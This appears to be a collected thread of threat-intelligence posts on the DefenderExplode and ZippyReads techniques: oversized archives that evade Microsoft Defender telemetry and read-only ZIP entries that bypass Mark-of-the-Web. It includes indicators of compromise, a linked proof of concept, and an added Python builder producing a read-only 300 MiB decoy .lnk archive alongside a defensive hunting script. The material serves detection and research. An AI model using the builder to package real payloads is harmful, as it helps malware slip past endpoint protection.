@GossiTheDog
Any custom detections you can share atm? Or will your #DefenderExplode detection already cover this?
Saw a #DefenderExplode (large file size to evade MS Defender) used to deliver #Ducktail trojan - Defender for Endpoint miss.
At first it looked like really lame malware, but it's interesting - it uses a legit copy of PHP and the malware is all written in PHP. Your AV doesn't trigger on legit php.exe.
Here's a prior write-up:
https://www.zscaler.com/blogs/security-research/new-php-variant-ducktail-infostealer-targeting-facebook-business-accounts
Another #zippyreads with #defenderexplode, Defender miss. https://www.virustotal.com/gui/search/8ff4a018d35c2c0f127784601b53048c83a541e20789fc7399ea0f645a0e50fa
A bit of #threatintel - MSTIC are tracking DEV-0408 using #ZippyReads and #DefenderExplode (well, they should be; they might not realise it, but they're tracking the same actors).
#threatintel #zippyreads #defenderexplode
@buffaloverflow Rich strikes again :O #DefenderExplode and #ZippyReads PoC, if anybody wants to have a play.
- Adds the read-only flag on the file in the ZIP to bypass MOTW without the November OS patches.
- Inflates file size on unzip, to evade logging in telemetry/detection.
https://gist.github.com/rxwx/8299693ac9f3f7118dc813da29e4d782
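The two tricks the PoC above combines, shown as an added example that is not the linked gist and not Rich's or Kevin's code: a ZIP entry carries MS-DOS attributes in the low byte of its external attributes, so setting bit 0x01 marks the extracted file read-only (the ZippyReads condition described above), and a payload padded with zeros deflates to almost nothing, so a tiny archive expands to a file well past the >100 MB point where the posts report Defender stops hashing and scanning. The entry name and the placeholder payload are hypothetical and constructed; no real shortcut file is built, and whether the extracted file ends up without a Zone.Identifier stream depends on the extractor and patch level, which this block does not exercise.

```python
import io
import zipfile

# MS-DOS attribute bit stored in the low byte of a ZIP entry's external attributes.
# Extractors that honour it write the file out read-only, which is the condition the
# ZippyReads MOTW bypass described above relies on.
FILE_ATTRIBUTE_READONLY = 0x01
CHUNK = 1024 * 1024  # stream the padding 1 MiB at a time so a 300 MiB entry never sits in RAM


def build_zip(entry_name, payload, inflate_to_mib, read_only=True):
    """Return the bytes of a ZIP holding one entry: payload followed by zero padding
    up to inflate_to_mib MiB. Zeros deflate to almost nothing, so the archive stays
    tiny while the extracted file crosses the large-file threshold."""
    target = inflate_to_mib * 1024 * 1024
    if len(payload) > target:
        raise ValueError("payload already larger than the requested size")
    info = zipfile.ZipInfo(entry_name)  # date_time defaults to 1980-01-01
    info.compress_type = zipfile.ZIP_DEFLATED
    if read_only:
        info.external_attr |= FILE_ATTRIBUTE_READONLY
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf, zf.open(info, "w") as out:
        out.write(payload)
        remaining = target - len(payload)
        zeros = b"\x00" * CHUNK
        while remaining > 0:
            n = min(CHUNK, remaining)
            out.write(zeros[:n])
            remaining -= n
    return buf.getvalue()


def inspect_zip(zip_bytes):
    """Read back what a scanner or extractor sees: attribute bit, stored vs. expanded size."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        info = zf.infolist()[0]
        return {
            "name": info.filename,
            "read_only": bool(info.external_attr & FILE_ATTRIBUTE_READONLY),
            "compressed": info.compress_size,
            "uncompressed": info.file_size,
            "archive_bytes": len(zip_bytes),
        }


if __name__ == "__main__":
    # Hypothetical entry name; the payload is a constructed placeholder, not a real .lnk.
    archive = build_zip("invoice.pdf.lnk", b"placeholder payload\n", inflate_to_mib=300)
    print(inspect_zip(archive))
```

Running the block builds a 300 MiB entry that compresses to a few hundred kilobytes on disk; `inspect_zip` is the check a defender can run on an inbound archive without extracting it, since `file_size` in the central directory already reveals the expansion ratio and `external_attr` reveals the read-only bit.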
@dasgrog Defender for Endpoint should pick things up in EDR (that said, I haven't tested with this one, and we've had complete Defender for Endpoint misses on #DefenderExplode before, where not a single alert triggered).
UK energy supply trojan #threatintel
#Octopus Energy themed trojan using #ZippyReads MOTW bypass and #DefenderExplode Defender AV telemetry bypass
Riffing off UK energy supply issues
IoCs
C2 docusign-octopus-energy.com
Filename OctopusEnergyS.pdf..lnk
Hash 7ff60dd9d6b5de8f5235d4d3975d8fcfbc96ceaec9aafb9ab9bd40f192490ff9
Size 300 MB
Filename %AppData%\Local\Temp\.hta
Writes self using certutil decode.
Trojan DLL, 323 MB:
\AppData\Local\Temp\x.dll
#threatintel #octopus #zippyreads #defenderexplode
Regarding #DefenderExplode - making a small ZIP file that explodes in size to >100 MB and breaks Defender AV detection/telemetry - does anybody know what attackers are using to build it? I see them using large .lnk files for infostealers still; it's been going on for months.
Either that or could somebody build a PoC that does the same thing? I'm wondering if they're using something like ZipBomb (https://www.bamsoftware.com/hacks/zipbomb/)
As found by @buffaloverflow, #ZippyReads and #DefenderExplode have been used in the wild since early October. Might write a blog on the Defender issue later as this stuff is just sailing through MS suite still. https://infosec.exchange/@buffaloverflow/109393786384764390
Here’s what #DefenderExplode looks like in MS Defender telemetry, they’re missing file hashes and detection.
Written a Defender advanced hunting query for #DefenderExplode with .lnk files
https://github.com/GossiTheDog/ThreatHunting/blob/master/AdvancedHuntingQueries/DefenderExplode.ahq
If you run this one in Defender for Endpoint, AV misses and EDR logs it with zero file hash value (including in their own telemetry) - that one is #DefenderExplode, I have told MS about it, it's being used by infostealer groups.
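The hunting logic the posts above describe (a .lnk over the large-file threshold, a file event logged with an empty SHA256, and the decoy double extension seen in the Octopus Energy sample), written out as an added example over constructed telemetry rows; this is not the linked .ahq query and not Kevin's code. The rows imitate the shape of a Defender for Endpoint DeviceFileEvents result but are made up for the example, the decoy-extension list is a hypothetical starting point, and the KQL in the docstring is an approximation of the idea rather than the published query.

```python
LARGE_FILE_BYTES = 100 * 1024 * 1024  # the >100 MB point the posts describe
DECOY_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")  # hypothetical decoy list

# Constructed rows in the shape of a DeviceFileEvents result; not real telemetry.
SAMPLE_EVENTS = [
    {"Timestamp": "2022-11-28T09:12:01Z", "DeviceName": "lap-01", "ActionType": "FileCreated",
     "FileName": "OctopusEnergyS.pdf..lnk",
     "FolderPath": "C:\\Users\\u\\Downloads\\OctopusEnergyS.pdf..lnk",
     "FileSize": 300 * 1024 * 1024, "SHA256": ""},
    {"Timestamp": "2022-11-28T09:12:40Z", "DeviceName": "lap-01", "ActionType": "FileCreated",
     "FileName": "x.dll", "FolderPath": "C:\\Users\\u\\AppData\\Local\\Temp\\x.dll",
     "FileSize": 323 * 1024 * 1024, "SHA256": ""},
    {"Timestamp": "2022-11-28T10:01:13Z", "DeviceName": "lap-02", "ActionType": "FileCreated",
     "FileName": "report.lnk", "FolderPath": "C:\\Users\\u\\Desktop\\report.lnk",
     "FileSize": 2048, "SHA256": "0" * 64},
    {"Timestamp": "2022-11-28T10:07:55Z", "DeviceName": "lap-02", "ActionType": "FileCreated",
     "FileName": "big_installer.exe", "FolderPath": "C:\\Users\\u\\Downloads\\big_installer.exe",
     "FileSize": 250 * 1024 * 1024, "SHA256": "1" * 64},
]


def indicators(event):
    """Return the list of DefenderExplode indicators a single file event matches.

    Rough KQL equivalent (an approximation, not the query linked above):
        DeviceFileEvents
        | where FileName endswith ".lnk"
        | where FileSize > 104857600 or isempty(SHA256)
    """
    name = event["FileName"].lower()
    size = event["FileSize"]
    hits = []
    # Telemetry with no hash on a large file is the symptom described in the posts.
    if size > LARGE_FILE_BYTES and not event.get("SHA256"):
        hits.append("large_file_without_hash")
    if name.endswith(".lnk"):
        if size > LARGE_FILE_BYTES:
            hits.append("oversized_lnk")  # a real shortcut is a few KB at most
        stem = name[:-len(".lnk")].rstrip(".")  # tolerate the "pdf..lnk" double dot
        if any(stem.endswith(ext) for ext in DECOY_EXTENSIONS):
            hits.append("decoy_double_extension")
    return hits


def hunt(events):
    """Return (FileName, indicators) for every event that matches at least one indicator."""
    findings = []
    for event in events:
        hits = indicators(event)
        if hits:
            findings.append((event["FileName"], hits))
    return findings


if __name__ == "__main__":
    for filename, hits in hunt(SAMPLE_EVENTS):
        print(filename, hits)
```

The empty-hash indicator is deliberately kept separate from the .lnk rules: on its own it is a lead, not a verdict, because any legitimately large download will show the same telemetry gap, so the hunt leans on the combination with an oversized shortcut or a decoy extension before anything is escalated.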
Great #malware sample caught by @k3dg3 #threatintel
Exploits #ZippyReads (read-only file for bypass of Mark-of-the-Web) and #DefenderExplode, a large-file zero-day in Microsoft Defender AV which breaks their telemetry and detection.
Targets Italy. Calls michaelpagerecruitment-ukoffers[.]com
https://www.virustotal.com/gui/file/13846a9778f224ae692edddcc90746d0e619f872733c2c880188c36797b2c4e7
#malware #threatintel #zippyreads #defenderexplode